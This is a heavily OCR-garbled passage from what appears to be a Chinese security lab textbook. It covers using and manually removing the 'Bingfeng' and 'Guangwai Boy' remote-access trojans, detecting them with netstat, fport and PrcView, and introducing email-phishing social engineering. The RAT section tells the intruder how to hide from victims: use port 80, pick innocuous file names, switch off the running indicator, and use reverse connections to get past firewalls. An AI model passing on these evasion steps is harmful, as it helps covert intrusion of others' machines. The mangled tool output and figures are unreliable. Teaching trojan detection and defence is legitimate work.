删除 ”“ 文 件 打 开 ” 等 ,可 以 查看 、 查 找 、 压 缩 、 复 制 . 删 除 、 打 开 远 程 主机 上 的 某 个 文件 。“ 目 
录 增 删 * 和 “目录 复制 ”可 以 增加 、 删 除 、 复 制 远程 主机 上 某 个 目录 。 
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图 1212 网 上 邻居 显示 的 新 建 共享 


例如 ,在 目标 机 的 C 盘 上 建立 1. txt 文 件 ,然后 单 击 " 冰 河 " 文 本 浏览 选项 ,输入 文件 名 
C:\1. txt, 再 单 击 “ 快 速 查看 "按钮 ,如 图 12. 13 所 示 。 
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图 1213 浏览 目标 机 上 的 文件 


(5) 注册 表 读 写 。 
展开 “注册 表 读 写 ”, 其 下 提供 了 “ 键 值 读 取 ”、“ 键 值 写 人 ”“ 刍 值 重 命名 ”、“ 主 键 浏览 ”、 
“主键 增删 "和 “主键 复制 "等 功能 。 
各 功能 的 界面 如 图 12. 14 一 图 12. 19 所 示 , 其 主要 功能 就 是 删除 修改、 增加 表 项 和 
+ 253 。 
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图 1214 读 取 键 值 
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图 1219 浏览 键 值 


(6) 设置 类 命令 。 

展开 “设置 类 命令 ”, 其 下 提供 了 “更 换 墙纸 ”“ 更 改 计算 机 名 ”和 “服务 器 端 配置 "( 见 
图 12. 20) 的 功能 。 

通过 命令 控制 台 , 就 可 以 完全 控制 一 台 远 程 主机 ,查看 和 寻找 所 需 的 任何 信息 ,所 以 森 
马 的 危害 是 极其 巨大 的 。 

2) 删除 “冰河 "木马 

删除 “冰河 ”木马 主要 有 以 下 几 种 方法 。 

CD 客户 端的 自动 卸载 功能 。 

在 “控制 类 命令 ”中 的 “系统 控制 "里 就 有 自动 卸载 功能 ,执行 这 个 功能 ,远程 主机 上 的 木 
马 就 自动 卸载 了 。 
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图 1220 显示 服务 器 配置 
(2) 手动 卸载 。 
这 是 本 实验 主要 介绍 的 方法 ,这 是 因为 在 实际 情况 中 木马 客户 端 不 可 能 为 木马 服务 器 
端 自动 卸载 木马 。 在 发 现 计算 机 有 异常 情况 时 (比如 经 常 自 动 重启 、 密 码 信 息 泄漏 .桌面 不 
正常 时 ) ,就 应 该 怀疑 是 否 已 经 中 了 木马 ,这 时 应 该 查看 注册 表 , 在 “开始 ”的 “运行 "里 面 输入 
regedit, 打 开 Windows 注册 表 编 辑 器 。 依 次 打开 子 键 目录 HKEY_LOCAL_MACHINE\ 
SOFTWARE\Microsoft\ Windows\CurrentVersion\Run, 如 图 12. 21 所 示 。 


E 注册 表 编辑 器 


数据 

C:\WINNT\system 32\Kernel32,exe 
C:\WINNT\avserve2.exe 
C:\WINNT\csrss.exe 

C:\Program Flles\undil32,exe 





C:\Program Files\yising\Rfw\Rfw.exe 
mobsync.exe flogon 








图 122 注册 表 Rn 子 键 目录 
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在 目录 中 发 现 了 一 个 默认 的 键 值 C:\WINNT\system32\kernel32. exe. 这 就 是 “冰河 ” 
木马 在 注册 表 中 加 入 的 键 值 ,将 它 删除 。 

再 打开 子 键 目录 HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows\ 
CurrentVersion\RunServices, 如 图 12. 22 所 示 。 
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图 1222 注册 表 RunServices 子 键 目录 








在 目录 中 也 发 现 了 一 个 默认 的 键 值 C:\WINNT\system32\kernel32. exe, 这 也 是 “ 冰 
河 ? 木 马 在 注册 表 中 加 入 的 键 值 ,将 它 删 除 。 上面 两 个 注册 表 的 子 键 目 录 Run 和 
RunServices 中 存放 的 键 值 是 系统 启动 时 自动 启动 的 程序 ,一 般 病毒 程序 .木马 程序 和 后 门 
程序 等 都 放 在 这 些 子 键 目录 下 ,所 以 要 经 常 检 查 这 些 子 键 目录 下 的 程序 ,如 果 有 不 明 程序 ， 
要 着 重 进行 分 析 。 

接 下 来 中 断 木 马 进 程 。 进 入 任务 管理 器 ,结束 正在 运行 的 kernel32. exe, 如 图 12. 23 
所 示 。 

然后 进入 C:\WINNT\system32 目录 ,找到 “冰河 ”木马 的 两 个 可 执行 文件 kernel32 
.exe 和 Sysexplr. exe 文件 ,将 它们 删除 ,如 图 12. 24 所 示 。 

修改 文件 关联 也 是 木马 常用 的 手段 。“ 冰 河 ” 木 马 将 txt 文件 的 默认 打开 方式 由 
notepad. exe 改 为 木马 的 启动 程序 , 除 此 之 外 ,html、exe、zip、com 等 也 都 是 木马 的 目标 。 所 
以 ,在 最 后 需要 恢复 注册 表 中 的 txt 文件 关联 功能 ,只 要 将 注册 表 的 HKEY_CLASSES_ 
ROOT\txtfile\ shell \ open\ command 下 的 默认 值 由 中 木马 后 的 C: \ Windows \ system V 
Sysexplr. exe %1 改 为 正常 情况 下 的 C:\Windows\notepad. exe %1 即 可 ,如 图 12. 25 
所 示 。 
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图 1224 Syexpirexe X: {Fl kermnel32exe 文 件 


最 后 ,重新 启动 主机 即 可 ,这 样 就 把 “冰河 ?木马 彻底 删除 了 。 

COD 杀毒 软件 查 杀 。 

大 部 分 杀毒 软件 都 有 查 杀 木马 的 功能 ,可 以 通过 这 个 功能 对 主机 进行 全 面 扫描 来 去 除 
木马 。 

2.“ 广 外 男生 ”的 使 用 

“ 广 外 男生 ”是 广 外 程序 员 网 络 小 组 制作 的 远程 控制 以 及 网 络 监控 工具 。 它 采用 了 “ 端 
口 反弹 ”和 ”线程 插入 ?技术 ,可 以 有 效 逃 避 防 火 墙 对 木马 程序 的 拦截 。 

1)“ 广 外 男生 ”的 客户 端 和 服务 器 端的 配置 和 连接 

CD 打开 “ 广 外 男生 ”的 主 程序 ,界面 如 图 12. 26 所 示 。 

(2) 进行 客户 端 设置 。 选 择 菜 单 “ 设 置 " 一 “客户 端 设置 "命令 ,弹出 客户 端 设置 界面 ,如 
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图 1225 恢复 以 文件 关联 功能 
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B26 ”分 外 男生 ” 主 界面 


图 12. 27 所 示 ,在 窗口 中 可 以 看 到 它 采 用 ”反弹 端口 十 线程 插 和 人 技术 ”的 提示 。 
在 “客户 端 最 大 连接 数 "中 填 人 允许 多 少 台 客 户 端 主机 来 控制 服务 器 端 , 注 意 不 要 填 人 
太 大 的 数字 ,否则 容易 造成 服务 器 端 主机 死机 。 在 ”客户 端 使 用 端口 "中 填 人 服务 器 端 连接 
到 客户 端的 哪个 端口 ,这 是 迷惑 远程 服务 器 端 主机 管理 员 和 防火 墙 的 关键 , 填 人 一 些 常用 的 
端口 ,会 使 远程 主机 管理 员 和 防火 墙 误 以 为 连接 的 是 一 个 合法 的 程序 。 比 如 使 用 端口 80， 
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图 1227 客户 端 设 置 


就 会 使 管理 员 以 为 自己 连接 在 远程 的 Web 服务 器 上 。 选 择 * 只 允许 以 上 地 址 连接 ?选项 ,使 
客户 端 主机 TP 地 址 处 于 默认 的 合法 控制 IP 地 址 池 中 。 
(3) 单 击 " 下 一 步 "按钮 ,设置 木马 的 连接 类 型 ,弹出 如 图 12. 28 所 示 的 对 话 框 。 
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图 1228 设置 连接 类 型 


连接 类 型 有 两 种 ,一 是 “使 用 HTTP 网 页 IP 通知 ”, 二 是 “客户 端 处 于 静态 卫 ( 固 定 
IP 地 址 )”。 本 试验 选择 第 二 项 。 

单 击 “下 一 步 " 按 钮 ,显示 出 完成 设置 的 对 话 框 ,点 击 “ 完 成 "就 结束 了 客户 端的 设置 。 

(4) 进行 服务 器 端 设置 。 选 择 菜 单 “设置 "一 “生成 服务 器 端 "命令 ,这 时 ,会 弹出 “ 广 外 
男生 ”服务 器 端 生 成 向 导 , 直 接 单 击 “ 下 一 步 ” 按 钮 ,弹出 如 图 12. 29 所 示 的 常规 设置 界面 。 

TE" EXE 文件 名 ”和 “DLL 文件 名 ”中 填 入 加 载 到 远程 主机 系统 目录 下 的 可 执行 文件 和 
动态 链接 库 文件 ,在 “注册 表 项 目 ” 中 填 入 加 载 到 远程 主机 注册 表 中 的 Run 目录 下 的 键 值 
名 。 这 些 文件 名 都 是 相当 重要 的 ,因为 这 是 迷惑 远程 主机 管理 员 的 关键 所 在 ,如 果 文件 名 起 
得 非常 有 隐蔽 性 ,比如 sysremote. exe、sysremote. dll, 那 么 就 算 管理 员 发 现 了 这 些 文件 ,也 
不 知道 这 些 文件 可 能 就 是 木马 文件 。 
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图 1229 常规 设置 选项 


HER: 把 “服务 端 运行 时 显示 运行 标识 并 允许 对 方 退出 ”前面 的 对 钩 去 掉 , 和 否则 服务 器 
端 主 机 的 管理 员 就 可 以 轻易 发 现 自己 被 控制 了 。 
(5) 单 击 * 下 一 步 ? 按 钮 ,弹出 网 络 设置 对 话 框 , 如 图 12. 30 所 示 。 
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图 1230 网 络 设置 


由 于 前 面 选择 的 是 “客户 端 处 于 静态 IP”, 所 以 此 处 选择 “静态 IP” 选 项 ,在 “客户 端 IP 
地 址 ”中 填 人 入侵 者 的 静态 IP 地 址 , “客户 端 用 端口 " 填 入 在 客户 端 设置 中 选择 的 连接 端口 。 

(6) 单 击 “ 下 一 步 ” 按 钮 ,弹出 生成 文件 的 界面 ,如 图 12. 31 所 示 。 

在 “目标 文件 ”中 填 和 人 所 生成 的 服务 器 端 程序 的 存放 位 置 ,如 E:\gwboy092A\hacktest 
.exe, 这 个 文件 就 是 需要 植 入 远程 主机 的 木马 文件 。 单 击 “ 完 成 ”按钮 即 可 完成 服务 器 端 程 
序 的 设置 ,这 时 就 生成 了 一 个 名 为 hacktest. exe 的 可 执行 文件 。 

(7) 在 目标 主机 上 执行 木马 程序 hacktest. exe. 当然 在 实际 情况 中 , 想 在 远程 主机 中 植 
人 木马 程序 是 很 复杂 的 事情 ,这 涉及 社会 工程 学 ,文件 伪装 等 技术 。 由 于 采用 了 反弹 端口 技 
R ,在 服务 器 端 主机 上 执行 木马 程序 后 ,客户 端 主机 只 需 等 待 服务 器 端 主机 主动 连接 ,过 了 
一 段 时间 后 .客户 端 主机 “ 广 外 男生 ”显示 界面 如 图 12. 32 所 示 ,表示 连接 成 功 。 

这 时 ,就 可 以 和 使 用 第 二 代 木 马 “ 冰 河 ” 一 样 控制 远程 主机 ,主要 的 控制 选项 有 “文件 共 
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图 1232 连接 成 功 界面 


享 ”“ 远 程 注册 表 ”“ 进 程 与 服务 "和 ”远程 桌面 等 。 

2)“ 广 外 男生 ”的 检测 

CD 由 于 使 用 了 “线程 插入 ”技术 ,所 以 在 Windows 系统 中 采用 任务 管理 器 查看 线程 是 
发 现 不 了 木马 的 踪迹 的 ,只 能 看 到 一 些 正常 的 线程 在 运行 ,所 以 本 实验 要 使 用 两 个 强大 的 工 
H Fport 和 PreView, Fport 是 第 三 方 提供 的 一 个 工具 ,可 以 查看 某 个 具体 的 端口 被 哪个 进 
程 所 占用 ,并 能 查看 PID。PrcView 是 线程 查看 工具 ,功能 非常 强 , 可 以 利用 它 查 看 进程 中 
有 哪些 动态 链接 库 在 运行 ,这 对 于 检测 插入 在 某 个 正常 的 进程 中 的 线程 是 非常 有 用 的 。 

(2) 在 服务 器 端 主机 上 选择 “开始 ”一 运行 ,输入 cmd, 进 入 命令 行 提示 符 状态 ,输入 
netstat -an ,查看 网 络 端口 占用 状态 .如 图 12.33 所 示 。 

在 显示 的 结果 中 , 反 白 的 部 分 可 以 看 到 一 个 可 疑 的 IP 地 址 (就 是 客户 端的 IP 地 址 ) 与 
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C:\Documents and Settings\cxgao>netstat -an 


fictive Connection 


Proto Local fiddre Foreign fiddre State 
TCP .8.8. E NNI LISTENING 
TCP -6.8. .8.8.8:8 LISTENING 
TCP .8.9.0:44 .8.8.8:8 LISTENING 
TCP E NIE .8.8:8 LISTENING 
TCP INI MEM 5 : 44 ABLISHED 


TC -5:9 E :1845 ABLISHED 
TCP < . ote 5 STABLISHED 
TCP 9 fare - - 71047 STABLISHED 
TCP .64. ʻ B.B.B.B:B A 
59.64.1 ESTRBLISHED 
59.64.1723. ESTABLISHED 
59.64.131. ESTABLISHED 
59.64.15.. ESTABLISHED 
[RT] LISTENING 
0.0.0:8 LISTENING 
-168.190.1:139 NNI LISTENING 
0.0.0.0:445 :™ 
B.B.B.B:5B98 :* 








图 1233 查看 网 络 状态 





的 地 方 , 记 住 本 机 用 于 连接 的 端口 号 1044、1045、1046 





lL 建立 了 连接 ,这 
fll 1047, 
(3) 接着 在 提示 符 下 输入 fport( 注 
如 图 12. 34 所 示 。 








,要 在 有 fport. exe 的 目录 中 运行 fport) ,显示 结果 





fport 
8 - TCP/IP Proce pet Mapper 
Copyright 2888 by Foundstone, Inc 


http://www. foundstone.com 


id Proce Port Proto Path 
qubo y892 98 ICP — F:stoolwhackers qv 92 \qubo y892 .e 
135 TCP 
System 139 TCP 
System 445 TCP 
1826 TCP 
Explorer C: \WINDOWS NExplorer.EXE 
Explorer C: \WINDOWS NExplorer.EXE 
Explorer C: \WINDOWS NExplorer.EXE 
Explorer C: \WINDOWS NExplorer.EXE 


Explorer d WINDOWS \Explorer 
Explorer = WINDOWS NExplorer. 
Explorer > : WINDOWS NExplorer 


ten 
yB92 2 :Ntool*hackers \gwho y892 qubo y892 . exe 

System 

gwboy892 38 F:\tool\hackers \gwho y892 squbo yB9 
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2A 查看 进程 占用 端口 情况 


















在 显示 结果 中 ,找到 端口 号 1044, 1045, 1046 和 1047. 发 现 木 马 插入 的 进程 是 
Explorer. EXE, 记 住 此 进程 的 PID 号 2040, 
1) 在 Windows 下 双击 运行 PrceView.# £ fl Explorer. EXE 中 运行 的 动态 链接 库 , 方 
法 是 右 击 Explorer. EXE, 在 快捷 选择 “模块 ”命令 ,显示 结果 如 图 12. 35 所 示 。 
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dows Explorer 6,00.2900.2180. (C) Microsoft 
jacta 


SWAN SERRE ee 
actxprn 
WINCOWSIsysten C2 MDVAPISO di 
32lsppHelp. dl 


9 :\WINDOWS|system32\CLECATQ. DLL 
Isystem32lcomcts2. dl 
i: E :|WINDOWS|WinS»S}x86, Microsoft. Win 
comdg32.dl 76320000 290816 2004-8-12 8:00 C:\WINDOWS\: il 
2 $i CWINDOWS\system32\COMRes. di 





2S 查看 动态 链接 库 


在 众多 的 动态 链接 库 文件 中 ,木马 的 DLL 文件 gwboydll. dll 在 实际 情况 中 是 可 以 改变 
的 ,所 以 一 定 要 仔细 检查 ,看 是 否 有 可 疑 文件 ,查看 时 可 以 找 一 台 正常 的 主机 进行 对 比 。 

(5) 为 查看 木马 gwboydll. dll 是 否 还 插入 了 其 他 的 进程 ,选择 进程 查看 器 的 “查看 ”一 
“模块 使 用 情况 ”命令 ,显示 结果 如 图 12. 36 所 示 。 

在 显示 结果 中 发 现 ,木马 插入 了 两 个 进程 ,除了 Explorer. EXE 之 外 还 有 一 个 进程 。 根 
据 程序 基地 址 的 位 置 ,可 以 知道 图 上 第 二 个 gwboydll. dll 为 Explorer. EXE 的 进程 。 而 为 
确定 另 一 个 gwboydll. dll 的 进程 ,在 此 DLL 文件 上 双击 (如 图 12. 37 所 示 ) ,出现 了 
ctfmon. exe, 可 知 木马 插入 的 第 二 个 进程 是 ctfmon. exe, 这 是 木马 的 高 级 之 处 ,如 果 一 个 进 
程 被 杀 , 另 一 个 进程 还 会 运行 并 且 立 即 再 在 其 他 进程 中 插入 木马 文件 。 

3) 手动 删除 “ 广 外 男生 ”木马 

“ 广 外 男生 ?木马 除了 可 以 采用 防 病毒 软件 查 杀 之 外 ,还 可 以 通过 手动 方法 删除 ,具体 操 
作 步 骤 如 下 : 

(1) 选择 "开始 ”- 盖 运行 ”输入 regedit 进入 注册 表 , 展 开 HKEY_LOCAL_MACHINE\ 
SOFTWARE\ Microsoft\ Windows\ Current Version\ Run 子 键 目录 ,在 里 面 找到 木马 自 启 
动 文件 ,将 其 删除 ,如 图 12. 38 所 示 。 

在 实际 情况 中 ,这 个 文件 名 是 可 以 改变 的 ,应 该 在 Run 目录 下 仔细 检查 是 否 有 可 疑 文 
件 ,对 可 疑 文 件 进行 删除 ,注意 删除 之 前 先 做 好 注册 表 的 备份 。 

(2) 进入 C:\WINNT\system32 文件 夹 下 , 按 文件 大 小 进行 排列 ,寻找 116KB 的 文件 ， 
如 图 12. 39 所 示 。 
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C:\WINDOWS\system32\DUSER dll 
c A Progan Files\Common Files\Symantec Shared\ecmid 
ci JPROGRUVCVCOBMONVTISYMANT [RUS 209 


a ign FieslAdobelPhotoshop 7.0lPlug-Insl Adobe 
tem32|wbemlfastprox di 

& APROGRA -NCONMON-TWICROS -TGMARTT-1VED 

CAPROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FN 

C:\PROGRA~1\COMMON-~1\MICROS~1\SMARTT ~1\FP 


& ‘roy Files\Microsoft Office\OFFICE1 1\GdiPlus, DL 
e NWINDOWS\WmEY SB ] Microsoft. Windows. GdiPlus. 


C:AWINDOWS\system32\IMAGEHLP dl 
C:\Program FieslSymantec Antiirus\IMall. il 
€i IWRC armani Ee d 
CAWINDOWSIsystem32lIMSC: 

C:\Program Files\Common Files\Microsoft Shared\INK\IN 
CCAAPROGRA~1\COMMON~ 1 \MICROS~1 \SMARTT~1\IN 


























图 1237 木马 插入 的 另 一 进程 cimmexe 


264 。 





REIIIILIEN 








图 1038 删除 注册 表 中 木马 文件 





115 KB 2000-1-10 12;00 
116 KB 2000-1-10 4:00 
116 KB 2000-1-10 12:00 
116 KB 2000-1-10 4:00 
2 个 选 定 的 项 目 。 116 KB 2000-1-10 4:00 


" 116KB 2005-1-24 2:16 
总 计 文 件 大 小 : 236,544 FB 116 KB 2005-1-23 10:25 


gwboydldl 116 KB 2003-6-19 12:05 
gwboy 116 KB 2000-5-23 22:45 
116KB 2000-12-11 18:54 
117 KB 2000-1-10 4:00 | 
117 KB 2001-5-4 4:05 
117 KB 2000-1-10 4:00 
117 KB 2000-1-10 4:00 


e 17k8 2003-6-19 12:05 
m "m uarn SERENE amanna ud 
[= | 


图 1239 搜索 木马 文件 





在 这 些 文件 中 找到 修改 时 间 离 现在 比较 近 的 文件 ,一般 这 就 是 最 近 所 添加 的 文件 ,如 
图 12. 39 中 的 gwboy. exe 和 gwboydll. dll ,因为 这 两 个 文件 名 可 以 改变 ,所 以 采用 这 用 方法 
搜索 可 以 比较 容易 地 找到 木马 文件 ,将 gwboy. exe 文件 删除 。 

(3) 在 注册 表 中 ,选择 菜单 “编辑 ”一 “查找 ”命令 ,查找 文件 名 为 gwboydll. dll 的 文件 ， 
找到 后 将 相关 的 注册 表 项 全 部 删除 ,如 图 12. 40 所 示 。 

(4) 重新 启动 主机 , 按 FS 键 进入 带 命令 行 提示 的 安全 模式 ,再 进入 C:\ WINNT\ 
system32 中 ,输入 del gwboydll. dll 删除 木马 的 动态 链接 库 文件 ,至 此 就 彻底 把 木马 文件 清 
除了 。 

3. 木马 的 防范 

木马 的 危害 性 是 显而易见 的 ,通过 以 上 实验 知道 了 木马 的 攻击 原理 和 隐身 方法 ,就 可 以 
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CQ) {8c3cib17-e59d-11d2-b40b-00a024b9dddd} em $ 数据 
四国 (8C4EBIO3-516F-11D1-A6DF-006097C4E476)- i gwboydl,dl 
田 国 48C7461EF-2B13-1 1d2-BE35-3078302C2030} Aparent 
由 - 国 {8C758294-9351-1 1d1-9D1A-006008B0E5CA} 

(Gy {8C7866E0-1C02-43FA-8896-A24DDD521F64} 

由 - 国 {9cC7866E3-1C02-43FA-8896-A24DDD521F64} 

E- (8C836AFS-FFAC-1 100-8ED4-DOCD4FC2C17B) 

GQ (8CAE9687-8SB1-4605-B23C-17FFS2628296) 

E- {0017F24c-7F58-1102-7F63-00000000001C} 


cmm 2 

E- {802A86C2-906C-49ED-A758-751D6823713C} 
£C] {8D4604E1-1331-11d0-8168-00C04FD85AB4} 

由 - 国 {8D50ED77-F930-4DAA-6262-15374B89E271} 

E- (8D91090E-8955-11D1-ADCS-006008A5848C] 

由 - 国 (8082180F-BD29-11D1-887E-00CO4FD7A924) 
(C) {8Dp6c641-98CB-11D1-9846-00A024CFEF6D} 
四国 {8E17FFF3-C5BA-11D1-8D8A-0060088F38C8} 

H- 8E26BFC1-AFD6-11CF-BFFC-O0AADO3CFOFC) 
田 - 国 (8E27C928-1264-101C-8A2F-040224009c02) 

由 - 国 (8E27CS2F-1264-101C-8A2F-040224009C02) 
151] (86386743-8586-11D1-B164-00COF0283628) 

H- (8E6EG079-0CB7-1 1d2-8F 10-0000F87ABD16} 

H- (8E718888-423F-1102-876E-00A0C9082467) 
H-E 48E71888A-423F-11D2-876E-00A0C9082467) | 

> 





图 1240 删除 注册 表 中 的 相关 选项 


采取 措施 对 其 进行 防御 了 ,主要 方法 有 以 下 几 种 : 

CD 提高 防范 意识 ,不 要 打开 陌生 人 传 过 来 的 可 疑 邮 件 和 附件 ,即使 是 熟人 也 要 确认 来 
信 的 源 地 址 是 否 可 信 。 

(2) 如 果 网 速 变 得 很 慢 , 这 是 因为 人 侵 者 使 用 的 木马 抢占 带宽 。 这 时 可 以 双击 任务 栏 
右 下 角 的 连接 图 标 ,仔细 观察 一 下 "已 发 送 字 节 ?项 , 如 果 数 字 比 较 大 ,比如 1 一 3kbps, 几 乎 
可 以 肯定 有 人 在 下 载 自己 的 硬盘 文件 ,除非 自己 正在 使 用 FTP 等 协议 在 进行 文件 传输 。 

C) 查看 本 机 的 连接 ,在 本 机 上 通过 netstat -an( 或 第 三 方程 序 ) 查 看 所 有 的 TCP/UDP 
连接 , 当 有 某 些 TP 地 址 的 连接 使 用 不 常见 的 端口 (一 般 端口 号 大 于 1024) 与 主机 通信 时 ,对 
这 一 连接 就 需要 进一步 进行 分 析 。 

(4) 木马 可 以 通过 注册 表 启 动 , 所 以 可 以 通过 检查 注册 表 来 发 现 木 马 入 侵 的 痕迹 。 

(5) 使 用 杀毒 软件 和 防火 墙 。 许 多 杀毒 软件 有 清除 木马 的 功能 ,可 以 不 定期 在 脱 机 的 
情况 下 进行 检查 和 清除 。 另 外 ,有 的 杀毒 软件 还 提供 网 络 实时 监控 功能 ,这 一 功能 可 以 在 攻 
击 者 远程 执行 用 户主 机 上 的 文件 时 提供 报警 或 让 执行 失败 ,使 攻击 者 向 用 户主 机 上 载 可 执 
行文 件 后 无 法 正确 执行 ,从 而 避免 进一步 的 损失 。 防 火 墙 则 可 以 运行 IP 规则 编辑 器 关闭 某 
些 端口 的 通信 ,只 要 利用 防火 墙 关闭 木马 常用 的 一 些 端口 就 可 以 阻止 一 些 木 马 的 入 侵 ( 当 
然 , 木 马 也 可 以 随时 改变 其 利用 的 端口 ) 。 


实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阑 述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 13 章 邮件 钓鱼 社会 工程 学 实验 


13.1 社会 工程 学 


从 原理 上 来 说 ,社会 工程 学 是 通过 分 析 攻 击 对 象 的 心理 弱点 、 利 用 人 类 的 本 能 反应 以 及 
人 的 好 奇 、 贪 林 等 心理 特征 进行 的 ,例如 使 用 假冒 欺骗 或 引诱 等 多 种 手段 来 达到 攻击 目标 
的 一 种 攻击 手段 。 

其 实 , 社 会 工程 学 攻击 蕴含 了 各 种 灵活 构思 和 变化 因素 。 无 论 何 时 何 地 ,在 需要 套 取 所 
需要 的 信息 或 是 操作 之 前 ,攻击 的 实施 者 都 必须 掌握 大 量 的 相关 知识 基础 ,花费 时 间 去 从 事 
资料 的 收集 和 整理 ,并 做 必要 的 沟通 工作 。 


13.1.1 社会 工程 学 的 攻击 形式 


现代 社会 工程 学 攻击 通常 以 交谈 ,欺骗 .假冒 或 伪装 等 方式 开始 ,从 合法 用 户 那 里 套 取 
用 户 的 敏感 信息 ,例如 系统 配置 .密码 或 其 他 有 助 于 进一步 攻击 的 有 用 信息 ,然后 再 利用 此 
类 信息 结合 黑客 技术 实施 攻击 。 这 一 点 也 是 和 传统 技术 攻击 性 攻击 进行 系统 识别 .漏洞 分 
析 和 利用 甚至 暴力 破解 等 方式 之 间 的 最 大 区 别 。 从 这 个 层面 来 讲 , 社 会 工程 学 攻击 主要 是 
对 人 的 利用 ,有 时 甚至 是 对 人 性 优点 的 利用 ,例如 利用 人 的 善意 同情 心 。 

在 现代 通信 技术 、 互 联网 技术 以 及 社交 平台 飞速 发 展 的 今天 ,社会 工程 学 也 和 以 往 有 了 
很 大 的 不 同 , 现 在 社会 工程 学 攻击 可 以 利用 社交 网 络 进行 信息 搜集 ,同时 隐藏 自己 的 真实 身 
份 。 攻 击 者 可 以 通过 浏览 个 人 空间 与 博客 ,分 析 微 博 内 容 、 用 即时 聊天 工具 与 目标 进行 在 线 
沟通 ,甚至 可 以 获得 目标 的 高 度 信任 ,取得 目标 的 真实 姓名 、 电 话 、 邮 箱 , 其 至 是 生日 、 家 庭 成 
员 的 详细 信息 等 。 攻 击 者 把 搜集 到 的 信息 结合 相应 的 技术 手段 ,通过 网 络 实施 攻击 。 这 种 
通过 互联 网 进行 的 结合 社会 工程 学 技术 的 攻击 活动 ,大 大 降低 了 社会 工程 学 工程 师 所 面临 
的 风险 。 

人 们 热衷 于 上 社交 网 络 ,获取 结交 陌生 朋友 的 刺激 与 惊喜 ;通过 秀一 些 个 人 活动 ,与 社 
区 朋友 增进 感情 ,然而 这 些 种 种 行为 都 给 社会 工程 攻击 者 获取 个 人 隐私 留 下 了 便利 条 件 。 


13.1.2 社会 工程 学 技术 框架 


社会 工程 学 发 展 到 现在 ,已 经 具有 了 一 些 通用 的 技术 流程 与 共性 特征 。 其 中 , Social- 
Engineer 网 站 总 结 的 社会 工程 学 技术 框架 ,将 社会 工程 学 的 基本 工程 分 为 信息 搜集 ,诱导 、 
托 辞 和 心理 影响 4 个 环节 。 

信息 搜集 又 可 以 分 为 传统 的 信息 搜集 技术 和 非 传 统 的 信息 搜集 技术 。 其 中 ,传统 的 信 
息 搜 集 技 术 涉 及 的 信息 搜集 来 源 包括 目标 公司 和 个 人 网 站 、` 个 人 简历 .搜索 引擎 .Whois 查 
询 、 公 共 服 务 .社交 媒体 和 公开 报告 等 。 而 非 传统 的 信息 搜集 技术 则 包括 行业 专家 可 以 提供 
有 关 一 个 领域 的 具体 情报 信息 ;在 目标 公司 的 雇员 经 常 出 没 的 一 些 活动 或 场所 中 ,与 他 们 进 
ITRE: ;在 目标 公司 或 人 员 附 近 的 垃圾 搜寻 ,等 等 。 信 息 搜集 还 可 以 利用 Maltego T. 

+ 267 + 


SL, Maltego 是 一 个 高 度 自动 化 的 信息 搜集 工具 ,其 使 用 方法 也 非常 简单 ,Maltego 将 使 用 
所 有 已 知 的 变换 方式 来 获取 信息 ,并 生成 一 个 信息 关联 图 ,将 所 有 获得 的 信息 以 图 的 方式 呈 
现 出 来 ,非常 直观 。 

诱导 的 定义 是 : 通过 设计 一 些 表面 上 很 普通 且 无 关 的 对 话 , 精 巧 地 提取 出 有 价值 的 信 
息 。 这 种 对 话 可 能 发 生 在 目标 所 在 的 任何 地 点 ,如 饭店 健身房 、 电 话 以 及 网 络 聊天 室 中 等 。 
诱导 之 所 以 在 社会 工程 学 中 非常 有 用 ,是 因为 它 通 常 是 低 风险 的 ,而 且 难 以 被 发 现 。 即 使 目 
标 警觉 到 了 恶意 企图 ,也 经 常 只 是 简单 地 忽略 对 方 的 提问 ,而 不 会 采取 进一步 的 措施 。 

所 谓 托 辞 ,就 是 设计 一 个 虚构 的 场景 来 说 服 目标 泄漏 信息 或 者 执行 某 个 动作 的 一 种 艺 
术 。 这 与 简单 的 撒谎 有 很 大 的 差别 ,在 很 多 时 候 都 需要 创建 出 一 个 全 新 的 虚假 身份 ,然后 使 
用 这 一 身份 来 操纵 攻击 目标 。 社 会 工程 师 可 以 利用 托 辞 来 假冒 成 为 从 事 某 种 职业 或 承担 某 
个 角色 的 其 他 人 ,而 他 们 实际 上 却 从 来 没有 干 过 这 样 的 工作 。 

在 实施 社会 工程 学 攻击 的 过 程 中 ,最 后 也 是 最 关键 的 步骤 就 是 在 设计 的 托 辞 场景 中 对 
目标 进行 心理 影响 ,从 而 达成 所 预期 的 社会 工程 学 攻击 目标 ,也 就 是 套 取 敏感 信息 或 者 操纵 
目标 进行 特定 的 工作 。 通 过 一 些 人 性 心理 学 利用 的 准则 ,工程 师 可 以 驱使 目标 按照 自己 所 
期 望 的 方式 去 思考 ,动作 ,甚至 让 用 户 相信 所 做 的 这 一 切 都 是 有 利于 用 户 的 。 社 会 工程 师 们 
每 天 都 在 使 用 心理 操纵 的 艺术 。 


13.2 邮件 钓鱼 社会 工程 学 基础 实验 


在 进行 本 次 实验 之 前 ,假定 已 经 完成 了 社会 工程 学 攻击 的 前 面 的 情报 搜集 等 更 加 偏重 
于 非 计 算 机 技术 部 分 的 环节 ,所 以 主要 介绍 之 后 如 何 利用 SET 工具 集 来 完成 邮件 钓鱼 。 

社会 工程 学 工具 包 是 一 个 称 为 devolution 的 项 目 , 随 着 BackTrack 发 布 被 用 来 进行 渗 
透 测试 。 这 个 项 目的 框架 是 由 David Kennedy(CReLlk) 完 成 的 。 可 以 访问 http://www. 
social-engineer. org 获得 更 多 关于 SET 集 的 信息 。 

在 实施 渗透 的 场景 中 ,除了 在 发 现 软 硬 件 的 漏洞 并 实施 攻击 之 外 ,最 有 效 的 方法 就 是 洞 
察 对 方 的 思想 并 获得 所 有 与 之 相关 的 第 一 手 信息 ,这 个 渗透 技巧 称 为 社会 工程 学 攻击 。 基 
于 工具 和 软件 的 计算 机 系统 促成 了 社会 工程 学 工具 包 SET 的 诞生 。 


实验 器 材 
PC(Windows XP/Windows 7).1 台 。 
预习 要 求 


(1) 社会 工程 学 的 基本 内 容 。 
(2) 社会 工程 学 的 攻击 形式 。 
(3) 社会 工程 学 的 基本 框架 知识 。 


实验 任务 
掌握 社会 工程 学 的 基本 技术 ,以 及 邮件 钓鱼 社会 工程 的 攻击 原理 。 
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验 环 境 
一 台 安 装 了 Back Track 5 的 PC。 
预备 知识 


(1) 社会 工程 学 攻击 原理 。 
(2) 邮件 钓鱼 知识 。 


por 


